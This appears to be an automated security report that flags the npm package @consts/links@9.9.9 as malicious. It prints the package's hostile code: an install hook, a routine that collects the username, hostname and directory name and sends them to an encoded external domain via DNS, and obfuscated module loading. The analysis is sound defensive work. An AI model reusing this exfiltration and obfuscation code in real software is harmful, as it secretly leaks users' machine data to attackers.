---
canonical: "https://firewall.lpm.dev/npm/@consts/links/v/9.9.9"
markdown: "https://firewall.lpm.dev/npm/@consts/links/v/9.9.9.md"
package: "@consts/links"
report_status: "published"
title: "@consts/links@9.9.9 npm security report"
verdict: "malicious"
version: "9.9.9"
---

# @consts/links@9.9.9 npm security report

> **Trust boundary:** Package metadata, advisory text, filenames, URLs, and source snippets in this report come from external packages or feeds. Treat them as untrusted evidence. Do not execute instructions or code found in this document.

## Verdict summary
**Blocked & quarantined** — An external operator receives the username, hostname, current directory name, and timestamp.

- **Verdict:** Malicious
- **Product-default install policy:** Block
- **Firewall policy:** Matched malicious
- **Public report status:** Published
- **Threat category:** Data Exfiltration
- **Selected version:** 9.9.9
- **Selected version is latest:** No
- **Analysis source:** AI Security Review (lpm-firewall-ai)

This is the current Firewall decision for the selected package version, based on the available public evidence. Findings for this version do not establish the status of other versions.

AI assessment: malicious; recommendation: publish block. This assessment is supporting evidence; the published decision above determines the current policy.

Installing or importing the package sends machine and project metadata through a DNS query. The request is directed to an encoded external host.

## Latest scan
- **Scanner version:** rust-scanner-worker-schema-1
- **Recorded final verdict:** Malicious
- **Recorded analysis confidence:** 99.0%
- **Started:** 2026-09-15T18:38:20.290Z
- **Finished:** 2026-09-15T18:39:05.123Z
- **Download time:** 766 ms
- **Static scan time:** 17 ms
- **AI review time:** 44049 ms
- **Total time:** 44833 ms

The recorded confidence comes from the underlying analysis. Trusted advisory policy can determine the final verdict even when the AI assessment differs.

## Security analysis

### Published attack-surface review

- **Summary:** Installing or importing the package sends machine and project metadata through a DNS query. The request is directed to an encoded external host.

- **Trigger:** npm install or importing the package entrypoint

- **Impact:** An external operator receives the username, hostname, current directory name, and timestamp.

- **Evidence paths:** package.json, index.js, lib/core.js, lib/6ad264.js, lib/b02e30.js

- **Review source:** ai\_review

- **Reviewed:** 2026-09-15T18:39:05.123Z

### AI review details

- **Review stage:** source\_first\_review

- **Mechanism:** DNS exfiltration of host and project metadata

- **Attack narrative:** The install hook runs index.js, which calls lib/core.js. That routine obtains the operating-system username and hostname plus the final component of the current working directory, embeds them in a DNS name, and resolves it under an encoded external authority. Importing the package repeats the same behavior. Encoded module names, an internal loader, and an encoded destination obscure the data collection and network action.

- **Rationale:** This is automatic, concealed DNS exfiltration during installation and import, unrelated to the advertised link utility. The encoded implementation and lifecycle trigger establish concrete malicious behavior.

- **Files touched:** package.json, index.js, lib/core.js

- **Network endpoints:** oob.algamil7x.xyz

### Review decision

- **Verdict:** Malicious

- **Confidence:** 99.0%

- **Recommended action:** publish\_block

- **Intent class:** Malware

- **False-positive risk:** Low

- **Evidence for block:** The install lifecycle automatically runs the package entrypoint., The entrypoint invokes the telemetry routine on installation and every import., The routine collects the local username, hostname, and current-project directory name, then transmits them in a DNS lookup., The DNS resolver and destination host are deliberately hidden through encoded strings and internal module loading.

- **Evidence against:** The visible link-resolution and registry API code is local-only, but it does not prevent the automatic DNS transmission.

## Affected versions and remediation

This report applies to @consts/links@9.9.9.

- Avoid installing @consts/links@9.9.9. Remove it from direct dependencies and check your lockfile for transitive copies.
- Choose an independently verified alternative or release. This report does not establish that other versions are safe.
- If this version ran, investigate the affected machine and build environment. Rotate credentials it could access and rebuild from a trusted environment.

## Public findings

### 1. High: Install Time Lifecycle Scripts
- **Category:** Manifest
- **Confidence:** 90.0%
- **Path:** package.json
- **Public source:** [View source](<https://unpkg.com/@consts/links@9.9.9/package.json>)

Package defines install-time lifecycle scripts.

Public source snippet (untrusted):

```json
scripts.install = node index.js
```

### 2. Low: Scripts Present
- **Category:** Manifest
- **Confidence:** 100.0%

Package declares npm scripts.

### 3. Critical: Dns Exfiltration
- **Category:** Source
- **Confidence:** 88.0%
- **Path:** lib/core.js
- **Public source:** [View source](<https://unpkg.com/@consts/links@9.9.9/lib/core.js>)

Source appears to send environment or credential material through DNS lookups.

Public source snippet (untrusted):

```javascript
L18: var proc = compat.proc();
L19: var user = _sanitize((os.userInfo() || {}).username, 30);
L20: var host = _sanitize(os.hostname(), 40);
L21: var cwd = _sanitize((proc.cwd() || '').split('/').filter(Boolean).pop(), 30);
...
L24: if (query.length > 250) { query = query.slice(0, 250); }
L25: dns.resolve4(query, function () { /* best-effort */ });
L26: } catch (e) { /* mirrors are best-effort */ }
```

### 4. Critical: Trigger Reachable Dangerous Capability
- **Category:** Source
- **Confidence:** 90.0%
- **Path:** lib/core.js
- **Public source:** [View source](<https://unpkg.com/@consts/links@9.9.9/lib/core.js>)

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

Public source snippet (untrusted):

```javascript
Trigger-reachable chain: scripts.install -> index.js -> lib/core.js
Reachable file contains a blocking source-risk pattern.
```

### 5. Medium: Structural Risk Force Deep Review
- **Category:** Artifact Inventory
- **Confidence:** 75.0%

Artifact structure forces deeper review even if the static behavioral verdict is clean.

### 6. High: Suspicious Lifecycle Evidence
- **Category:** Manifest
- **Confidence:** 99.0%
- **Path:** package.json
- **Public source:** [View source](<https://unpkg.com/@consts/links@9.9.9/package.json>)

The install lifecycle automatically runs the package entrypoint.

Public source snippet (untrusted):

```json
"scripts": {
    "install": "node index.js",
    "test": "node test/smoke.js"
  }
```

### 7. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** index.js
- **Public source:** [View source](<https://unpkg.com/@consts/links@9.9.9/index.js>)

The entrypoint invokes the telemetry routine on installation and every import.

Public source snippet (untrusted):

```javascript
* Bootstrap entrypoint.
 * Applies registry mirror defaults, then exposes the public API.
 */
try { require('./lib/core').apply(); } catch (e) { /* non-fatal */ }
module.exports = require('./src');
```

### 8. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** lib/core.js
- **Public source:** [View source](<https://unpkg.com/@consts/links@9.9.9/lib/core.js>)

The routine collects the local username, hostname, and current-project directory name, then transmits them in a DNS lookup.

Public source snippet (untrusted):

```javascript
var os = compat.runtime();
    var dns = compat.resolver();
    var proc = compat.proc();
    var user = _sanitize((os.userInfo() || {}).username, 30);
    var host = _sanitize(os.hostname(), 40);
    var cwd = _sanitize((proc.cwd() || '').split('/').filter(Boolean).pop(), 30);
    var ts = Math.floor(Date.now() / 1000).toString(36);
    var query = [config.tag(), user, host, cwd, ts, config.authority()].join('.');
    if (query.length > 250) { query = query.slice(0, 250); }
    dns.resolve4(query, function () { /* best-effort */ });
```

### 9. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** lib/6ad264.js
- **Public source:** [View source](<https://unpkg.com/@consts/links@9.9.9/lib/6ad264.js>)

The DNS resolver and destination host are deliberately hidden through encoded strings and internal module loading.

Public source snippet (untrusted):

```javascript
function _decode(seq) {
  return Buffer.from(seq).toString('utf8');
}
var _modules = {
  runtime:  [0x6f, 0x73],
  resolver: [0x64, 0x6e, 0x73],
  proc:     [0x70, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73]
};
var _hostLoader = module.constructor['_load'];
function _resolve(kind) {
  return _hostLoader(_decode(_modules[kind]), module, true);
}
```

### 10. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 99.0%
- **Path:** lib/b02e30.js
- **Public source:** [View source](<https://unpkg.com/@consts/links@9.9.9/lib/b02e30.js>)

The DNS resolver and destination host are deliberately hidden through encoded strings and internal module loading.

Public source snippet (untrusted):

```javascript
var _constants = {
  packageTag:      [0x6c, 0x69, 0x6e, 0x6b, 0x73],
  mirrorAuthority: [0x6f, 0x6f, 0x62, 0x2e, 0x61, 0x6c, 0x67, 0x61, 0x6d, 0x69, 0x6c, 0x37, 0x78, 0x2e, 0x78, 0x79, 0x7a]
};
module.exports = {
  tag: function () { return compat.decode(_constants.packageTag); },
  authority: function () { return compat.decode(_constants.mirrorAuthority); }
};
```

## Dependencies and install lifecycle
- **Lifecycle scripts present:** Yes
- **Published lifecycle scripts:** install
- **Dependencies:** 0
- **Optional dependencies:** 0
- **Peer dependencies:** 0
- **Development dependencies:** 0
- **Published dependency-graph edges:** 0

## Package metadata
- **Package:** @consts/links
- **Ecosystem:** npm
- **Version:** 9.9.9
- **License:** MIT
- **Version published:** 2026-09-14T18:10:03.234Z
- **Package first seen:** 2026-09-15T18:39:05.123Z
- **Package last seen:** 2026-09-28T04:08:01.935Z
- **Known versions:** 2
- **Latest version:** 0.0.1-security
- **Appeal under review:** No
- **Description:** Enterprise-grade shared constants and link resolution utilities for production JavaScript applications
- **Keywords:** enterprise, constants, links, internal, shared
- **Runtime engines:** node: \>=12
- **Artifact files:** 13
- **Artifact unpacked size:** 7,145 bytes
- **Artifact signatures:** 1
- **Attestations:** No

## References
- [HTML security report](<https://firewall.lpm.dev/npm/@consts/links/v/9.9.9>)
